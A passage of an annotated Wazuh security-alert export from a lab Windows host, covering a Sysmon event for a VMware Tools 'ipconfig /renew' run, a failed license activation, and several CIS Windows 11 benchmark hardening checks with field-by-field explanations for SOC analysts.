Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Suspicious Windows cmd shell execution
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92032
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087', 'T1059.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery', 'Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery', 'Windows Command Shell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534991.2461732
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:49:08.3376108Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  344733
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:49:08.269 ProcessGuid: {94294ddc-bfe4-680a-af0c-000000000e00} ProcessId: 9536 Image: C:\Windows\System32\ipconfig.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: IP Configuration Utility Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: ipconfig.exe CommandLine: C:\WINDOWS\system32\ipconfig /renew CurrentDirectory: C:\Windows\System32\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B ParentProcessGuid: {94294ddc-bfdb-680a-a50c-000000000e00} ParentProcessId: 3372 ParentImage: C:\Windows\System32\cmd.exe ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:49:08.269
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bfe4-680a-af0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9536
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\ipconfig.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  IP Configuration Utility
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  ipconfig.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\ipconfig /renew
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Windows\\System32\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bfdb-680a-a50c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3372
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\cmd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

License activation (slui.exe) failed.

🧠 What happened? License activation (slui.exe) failed.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:04.914+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:04.914+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  License activation (slui.exe) failed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60646
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535004.2467193
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  8198
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:49:31.1240683Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2428
Incremental log record number – handy for timeline order.

data.win.system.processID:  4516
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  ERROR
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "License Activation (slui.exe) failed with the following error code: hr=0x80004005 Command-line arguments: RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  hr=0x80004005, RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not enumerate connected users on domain-joined computers' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not enumerate connected users on domain-joined computers' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.231+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.231+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not enumerate connected users on domain-joined computers' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.5']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.8.28.3']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2469515
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26257
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Do not enumerate connected users on domain-joined computers' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting prevents connected users from being enumerated on domain-joined computers. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  A malicious user could use this feature to gather account names of other users, that information could then be used in conjunction with other types of attacks such as guessing passwords or social engineering. The value of this countermeasure is small because a user with domain credentials could gather the same account information using other methods.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\System\Logon\Do not enumerate connected users on domain-joined computers. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Logon.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.8.28.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  2.2.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off app notifications on the lock screen' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off app notifications on the lock screen' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.274+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.274+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off app notifications on the lock screen' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.5']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.8.28.5']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2473013
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26259
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn off app notifications on the lock screen' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to prevent app notifications from appearing on the lock screen. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  App notifications might display sensitive business or personal data.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\System\Logon\Turn off app notifications on the lock screen. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Logon.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.8.28.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  2.2.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off picture password sign-in' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off picture password sign-in' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.275+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.275+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off picture password sign-in' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '8.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.8.28.6']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2475885
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26260
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn off picture password sign-in' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to control whether a domain user can sign in using a picture password. The recommended state for this setting is: Enabled. Note: If the picture password feature is permitted, the user's domain password is cached in the system vault when using it.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Picture passwords bypass the requirement for a typed complex password. In a shared work environment, a simple shoulder surf where someone observed the on-screen gestures would allow that person to gain access to the system without the need to know the complex password. Vertical monitor screens with an image are much more visible at a distance than horizontal key strokes, increasing the likelihood of a successful observation of the mouse gestures.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\System\Logon\Turn off picture password sign-in. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CredentialProviders.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.8.28.6
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  8.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow network connectivity during connected-standby (plugged in)' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow network connectivity during connected-standby (plugged in)' is set to 'Disabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.311+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.311+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow network connectivity during connected-standby (plugged in)' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '8.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.8.34.6.2']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2479733
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26265
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Allow network connectivity during connected-standby (plugged in)' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to control the network connectivity state in standby on modern standby-capable systems. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Disabling this setting ensures that the computer will not be accessible to attackers over a WLAN network while left unattended, plugged in and in a sleep state.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\System\Power Management\Sleep Settings\Allow network connectivity during connected-standby (plugged in). Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Power.admx/adml that is included with the Microsoft Windows 10 Release 1607 & Server 2016 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.8.34.6.2
CIS Benchmark recommendation number this check implements. Same value as rule.cis, and the section to open in the benchmark for the full audit and remediation procedure.

data.sca.check.compliance.pci_dss:  8.2
PCI DSS requirement this individual check satisfies (rule.pci_dss above is the union the Wazuh rule carries).

data.sca.check.compliance.tsc:  CC6.1
SOC 2 Trust Services Criteria reference for this individual check.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Power\\PowerSettings\\f15576e8-98b7-4186-b944-eafa664402d9']
Registry key the SCA policy reads to decide pass/fail. The value name and expected data are in the policy file on the manager, not in the alert. Verify the fix against this key on the host; the GP UI path in the remediation text is only what writes it.

data.sca.check.result:  failed
passed, failed or not applicable. failed means the host deviates from the benchmark and Wazuh raises it as rule 19007 at level 7 (a passed check is rule 19008 at level 3); open a hardening ticket.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enable Windows NTP Server' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enable Windows NTP Server' is set to 'Disabled'.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:50:09.484+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.484+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enable Windows NTP Server' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

